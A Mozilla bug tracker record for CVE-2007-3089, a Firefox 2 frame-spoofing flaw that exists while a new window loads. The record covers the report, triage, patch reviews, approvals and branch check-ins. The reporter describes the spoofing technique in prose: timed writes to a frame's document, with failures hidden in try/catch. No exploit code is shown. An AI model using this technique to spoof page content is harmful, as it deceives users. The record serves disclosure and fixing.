Closed Bug 381300 (CVE-2007-3089) Opened 17 years ago Closed 17 years ago

Frame spoofing is possible within a short time frame while the window is loading.

Categories

(Core :: DOM: Core & HTML, defect)

1.8 Branch
defect
Not set
normal

Tracking

()

RESOLVED FIXED

People

(Reporter: ronen.zilberman, Assigned: jst)

References

Details

(Keywords: fixed1.8.0.15, fixed1.8.1.5, qawanted, Whiteboard: [sg:low spoof] 1.8-branch only)

Attachments

(3 files)

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3

When opening a window from a script, it is possible to spoof the content of the newly opened window's frames within a short time frame, while the window is loading.

Because the exact time is non-constant and unknown, multiple attempt are carried out. The failed ones are silently discarded using a try catch block.

This is similar to Bug 343168.
Both the 'frames[x].document.open()' method (described in above bug) and a normal 'frames[x].document' method are shown to reliably produce the exploit.

Reproducible: Always

Steps to Reproduce:
See attached test case.
Attached file Exploit testcase.
I can reproduce this with a current branch build, but not on the trunk.
Component: Security → DOM
Whiteboard: [sg:low spoof]
Assignee: dveditz → jst
Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: wanted1.8.1.x+
Flags: wanted1.8.0.x+
Flags: blocking1.8.1.5?
Flags: blocking1.8.0.13?
Whiteboard: [sg:low spoof] → [sg:low spoof] 1.8-branch only?
Version: unspecified → 1.8 Branch
QA Contact: toolkit → ian
It seems that the problem is this:

The frame's location is "about:blank" while it is being loaded, and it is during this time that it can be spoofed (after the parent document has been loaded, but before the framed document has been loaded).



This was fixed on the trunk by changing the way we treat about:blank
Whiteboard: [sg:low spoof] 1.8-branch only? → [sg:low spoof] 1.8-branch only
I wonder whether we could at least port part of that (e.g. the default principal for subframes)... Not sure how easy that would be.
Blocks: 382686
publicly disclosed by Michal Zalewski to full-disclosure.
Group: security
CC list accessible: false
Not accessible to reporter
The trunk fix was in bug 332182.  Looking at it now, it might not be impossible to merge to branch, if we're sure it doesn't break the web (which seems likely).  Some of the code is sure to not apply, and we'd need to add interfaces instead of changing them, but it might be doable in general....  Unfortunately, I'm not going to be able to do it in the near future.  :(
I think it's a critical vulnerability, do I? It's very dangerous if someone using this exploit to steal accounts..

I really appreciate if you can fix this since next branch build..
This bug got some publicity and one bank tells their users to 'stop using Firefox until it's fixed and switch to IE6'. http://www.multibank.pl/co_nowego/aktualnosci?_a=15793
Flags: blocking1.8.1.5?
Flags: blocking1.8.1.5+
Flags: blocking1.8.0.13?
Flags: blocking1.8.0.13+
It is gaining in publicity.
NIST's Vulnerability DB lists the CVSS Severity at a 10.0(High)  http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3089

All Fx users at my work got a message from our corp security team last week telling us to uninstall Fx immediately.
I've confirmed that this patch fixes the "exploit testcase" in this bug.  I have NOT had a chance to do any other testing yet.  In particular, I have not run it on the tests attached to bug 332182.  It would be great if someone would, with all the various new-window pref settings (at the very least, with the settings to force all new windows into windows, tabs, and same rendering area).

Note that the tests can be run with jssh; I think we have some documentation on mozilla.org for that.

I'll try to get this also ported to the 1.8.0 branch.
Attachment #269025 - Flags: superreview?(jst)
Attachment #269025 - Flags: review?(mrbkap)
I should also note that if run under jssh the tests will do the different pref values automatically...  So that's really the way to go, imo.
Works with all the testcases from bug 332182 here, on Firefox 2.0.0.4+patch.
I'm basically gone starting today for two weeks or so.  jst or Blake, could you drive this in?  I don't have the 1.8.0 port done (or even significantly started), unfortunately.  :(
Keywords: qawanted
Whiteboard: [sg:low spoof] 1.8-branch only → [sg:low spoof] 1.8-branch only, need r=mrbkap, sr=jst
required to fix public exploit bug 382686
Comment on attachment 269025 [details] [diff] [review]
Backport of fix for bug 325816 and bug 332182 to 1.8 branch

Looks good to me, sr=jst. I happened to spot one typo in surrounding code as I was reading through it, fix it if you want to:

- In nsDocShell::DoURILoad():

     // XXX: Is seems wrong that the owner is ignored - even if one is
Attachment #269025 - Flags: superreview?(jst) → superreview+
Comment on attachment 269025 [details] [diff] [review]
Backport of fix for bug 325816 and bug 332182 to 1.8 branch

*stamp*
Attachment #269025 - Flags: review?(mrbkap) → review+
Comment on attachment 269025 [details] [diff] [review]
Backport of fix for bug 325816 and bug 332182 to 1.8 branch

Hoping for some last-minute approval love.
Attachment #269025 - Flags: approval1.8.1.5?
Comment on attachment 269025 [details] [diff] [review]
Backport of fix for bug 325816 and bug 332182 to 1.8 branch

approved for 1.8.1.5, a=dveditz
Attachment #269025 - Flags: approval1.8.1.5? → approval1.8.1.5+
Status: NEW → RESOLVED
Closed: 17 years ago
Keywords: fixed1.8.1.5
Resolution: --- → FIXED
Attachment #271902 - Flags: approval1.8.0.13?
Please see bug 387979.
Depends on: 387979
Alias: CVE-2007-3089
Verified using test cases in comment #1 on Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.5) Gecko/2007071317 Firefox/2.0.0.5. Also on Mac 2005rc2 build.
Depends on: CVE-2007-3844
In the interest of getting a Thunderbird 1.5.0.13 out ASAP to address the known problems, this spoofing bug will need to wait for 1.8.0.14 releases
Flags: blocking1.8.0.13+ → blocking1.8.0.14+
Attachment #271902 - Flags: approval1.8.0.13? → approval1.8.0.14?
Not needed in a Thunderbird 1.8.0 release, still wanted for browsers
Flags: blocking1.8.0.15+
Flags: blocking1.8.0.14-
Flags: blocking1.8.0.14+
Attachment #271902 - Flags: approval1.8.0.15?
Comment on attachment 271902 [details] [diff] [review]
1.8.0 branch patch

a=caillon for 1.8.0.15 (and clearing stale .14 request)
Attachment #271902 - Flags: approval1.8.0.15?
Attachment #271902 - Flags: approval1.8.0.15+
Attachment #271902 - Flags: approval1.8.0.14?
Keywords: checkin-needed
Whiteboard: [sg:low spoof] 1.8-branch only, need r=mrbkap, sr=jst → [check in on 1.8.0. Bug 388121 MUST land with it][sg:low spoof] 1.8-branch only, need r=mrbkap, sr=jst
MOZILLA_1_8_0_BRANCH:

Checking in caps/src/nsPrincipal.cpp;
/cvsroot/mozilla/caps/src/nsPrincipal.cpp,v  <--  nsPrincipal.cpp
new revision: 1.37.2.1.2.1; previous revision: 1.37.2.1
done
Checking in caps/src/nsScriptSecurityManager.cpp;
/cvsroot/mozilla/caps/src/nsScriptSecurityManager.cpp,v  <--  nsScriptSecurityManager.cpp
new revision: 1.266.2.7.2.11; previous revision: 1.266.2.7.2.10
done
Checking in content/base/src/nsFrameLoader.cpp;
/cvsroot/mozilla/content/base/src/nsFrameLoader.cpp,v  <--  nsFrameLoader.cpp
new revision: 1.53.6.1.4.2; previous revision: 1.53.6.1.4.1
done
Checking in content/base/src/nsDocument.h;
/cvsroot/mozilla/content/base/src/nsDocument.h,v  <--  nsDocument.h
new revision: 3.264.2.3.2.5; previous revision: 3.264.2.3.2.4
done
Checking in content/base/src/nsDocument.cpp;
/cvsroot/mozilla/content/base/src/nsDocument.cpp,v  <--  nsDocument.cpp
new revision: 3.566.2.6.2.17; previous revision: 3.566.2.6.2.16
done
Checking in docshell/base/nsDocShell.cpp;
/cvsroot/mozilla/docshell/base/nsDocShell.cpp,v  <--  nsDocShell.cpp
new revision: 1.719.2.21.2.14; previous revision: 1.719.2.21.2.13
done
Checking in docshell/base/nsDocShell.h;
/cvsroot/mozilla/docshell/base/nsDocShell.h,v  <--  nsDocShell.h
new revision: 1.186.2.3.2.2; previous revision: 1.186.2.3.2.1
done
Checking in dom/public/base/nsPIDOMWindow.h;
/cvsroot/mozilla/dom/public/base/nsPIDOMWindow.h,v  <--  nsPIDOMWindow.h
new revision: 1.49.2.2.4.1; previous revision: 1.49.2.2
done
Checking in dom/src/base/nsGlobalWindow.cpp;
/cvsroot/mozilla/dom/src/base/nsGlobalWindow.cpp,v  <--  nsGlobalWindow.cpp
new revision: 1.761.2.22.2.23; previous revision: 1.761.2.22.2.22
done
Checking in dom/src/base/nsGlobalWindow.h;
/cvsroot/mozilla/dom/src/base/nsGlobalWindow.h,v  <--  nsGlobalWindow.h
new revision: 1.250.2.9.2.4; previous revision: 1.250.2.9.2.3
done
Checking in embedding/components/windowwatcher/src/Makefile.in;
/cvsroot/mozilla/embedding/components/windowwatcher/src/Makefile.in,v  <--  Makefile.in
new revision: 1.26.26.1; previous revision: 1.26
done
Checking in embedding/components/windowwatcher/src/nsWindowWatcher.h;
/cvsroot/mozilla/embedding/components/windowwatcher/src/nsWindowWatcher.h,v  <--  nsWindowWatcher.h
new revision: 1.21.8.1.4.2; previous revision: 1.21.8.1.4.1
done
Checking in embedding/components/windowwatcher/src/nsWindowWatcher.cpp;
/cvsroot/mozilla/embedding/components/windowwatcher/src/nsWindowWatcher.cpp,v  <--  nsWindowWatcher.cpp
new revision: 1.100.2.5.2.4; previous revision: 1.100.2.5.2.3
done
Checking in dom/src/jsurl/nsJSProtocolHandler.cpp;
/cvsroot/mozilla/dom/src/jsurl/nsJSProtocolHandler.cpp,v  <--  nsJSProtocolHandler.cpp
new revision: 1.113.2.2.2.5; previous revision: 1.113.2.2.2.4
done
Checking in content/html/document/src/nsHTMLDocument.cpp;
/cvsroot/mozilla/content/html/document/src/nsHTMLDocument.cpp,v  <--  nsHTMLDocument.cpp
new revision: 3.615.2.10.2.17; previous revision: 3.615.2.10.2.16
done
Checking in content/base/public/nsIDocument.h;
/cvsroot/mozilla/content/base/public/nsIDocument.h,v  <--  nsIDocument.h
new revision: 3.207.2.1.4.4; previous revision: 3.207.2.1.4.3
done
Whiteboard: [check in on 1.8.0. Bug 388121 MUST land with it][sg:low spoof] 1.8-branch only, need r=mrbkap, sr=jst → [sg:low spoof] 1.8-branch only
Blocks: 346663
Blocks: 346664
Component: DOM → DOM: Core & HTML
You need to log in before you can comment on or make changes to this bug.